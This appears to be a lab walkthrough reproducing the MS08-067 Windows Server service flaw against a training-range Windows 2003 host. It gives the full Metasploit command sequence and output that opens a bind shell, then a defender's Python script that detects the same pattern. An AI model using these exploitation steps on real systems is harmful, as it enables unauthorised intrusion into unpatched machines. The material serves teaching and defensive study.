Environment
- Target: Hongri (红日) range, ATT&CK Red Team Evaluation 01 - win2k3 at 192.168.52.141
- Attacker machine: 32-bit Kali at 172.24.4.7
- Traffic forwarding into the internal network is already set up
MS08-067 reproduction walkthrough
Vulnerability overview
MS08-067 is a security vulnerability disclosed in October 2008 that affects the Microsoft Windows operating system. It allows an attacker to execute arbitrary code remotely on an affected system by sending a specially crafted RPC (Remote Procedure Call) request to the Server service.
The vulnerability mainly affects Windows Server 2003, Windows XP and similar systems, especially those that expose the SMB service port 445 by default. Tools such as Metasploit include a module for it, which is what this walkthrough uses.
Run the command: msfconsole
```text
┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: Open an interactive Ruby terminal with irb

[Metasploit ASCII-art banner omitted]

       =[ metasploit v6.4.9-dev                          ]
+ -- --=[ 2420 exploits - 1248 auxiliary - 423 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/
```
Run the command: search ms08-067
```text
msf6 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
```
Run the command: use 0 (or use exploit/windows/smb/ms08_067_netapi)
```text
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) >
```
Run the command: set rhosts 192.168.52.141
```text
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.52.141
rhosts => 192.168.52.141
```
Run the command: set payload generic/shell_bind_tcp
```text
msf6 exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
```
Run the command: show options
```text
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.52.141   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (generic/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.52.141   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


View the full module info with the info, or info -d command.
```
Run the command: exploit (or run)
```text
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] 192.168.52.141:445 - Automatically detecting the target...
[*] 192.168.52.141:445 - Fingerprint: Windows 2003 - - lang:Unknown
[*] 192.168.52.141:445 - Selected Target: Windows 2003 SP0 Universal
[*] 192.168.52.141:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.52.141:4444
[*] Command shell session 1 opened (172.24.4.7:36497 -> 192.168.52.141:4444) at 2024-06-09 08:52:22 -0400

Shell Banner:
Microsoft Windows [Version 5.2.3790]
-----

C:\WINDOWS\system32>
```
Shell session established successfully (the bind shell on port 4444 connected).
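From the defender's side, the session log above leaves a recognisable footprint: an SMB connection on 445 from one host, followed within seconds by that same host connecting to an unexpected listening port (the module's default LPORT of 4444). The following is an added example, not part of the original post, that looks for exactly that sequence in a constructed connection log; the port allow-list and the two-minute window are assumptions to be tuned for a real environment.

```python
# Added example (not from the original post): flag the bind-shell pattern
# visible in the session log above - inbound SMB (445) from a host, then the
# same host connecting to an unexpected port on the same target shortly after.
from datetime import datetime, timedelta

# Constructed connection records: (timestamp, src_ip, dst_ip, dst_port)
SAMPLE_LOG = [
    ("2024-06-09 08:52:10", "172.24.4.7", "192.168.52.141", 445),
    ("2024-06-09 08:52:22", "172.24.4.7", "192.168.52.141", 4444),   # bind shell connect
    ("2024-06-09 09:00:00", "192.168.52.10", "192.168.52.141", 445),  # ordinary file-share use
    ("2024-06-09 09:01:00", "192.168.52.10", "192.168.52.141", 3389), # RDP: an expected port
    ("2024-06-09 09:20:00", "192.168.52.10", "192.168.52.141", 5555), # odd port, but 20 min later
]

# Ports this target is meant to serve (assumption; adjust per host role).
EXPECTED_PORTS = {135, 139, 445, 3389}

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def find_bind_shell_candidates(records, window=timedelta(minutes=2),
                               expected_ports=EXPECTED_PORTS):
    """Return (src, dst, port, smb_ts, follow_ts) for each suspicious sequence:
    an SMB connection followed, within `window`, by a connection from the same
    source to the same target on a port outside `expected_ports`."""
    recs = sorted(records, key=lambda r: parse_ts(r[0]))
    last_smb = {}   # (src, dst) -> timestamp of the most recent SMB connection
    hits = []
    for ts_str, src, dst, port in recs:
        ts = parse_ts(ts_str)
        if port == 445:
            last_smb[(src, dst)] = ts
            continue
        smb_ts = last_smb.get((src, dst))
        if smb_ts is not None and port not in expected_ports and ts - smb_ts <= window:
            hits.append((src, dst, port, smb_ts, ts))
    return hits

if __name__ == "__main__":
    for src, dst, port, smb_ts, ts in find_bind_shell_candidates(SAMPLE_LOG):
        print(f"suspicious: {src} hit SMB on {dst} at {smb_ts}, then port {port} at {ts}")
```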
PS: This is for learning only; please point out anything I got wrong.
Please make sure you are authorised before using these techniques, and that your actions comply with the law and with ethical guidelines. This information is provided for educational and research purposes only.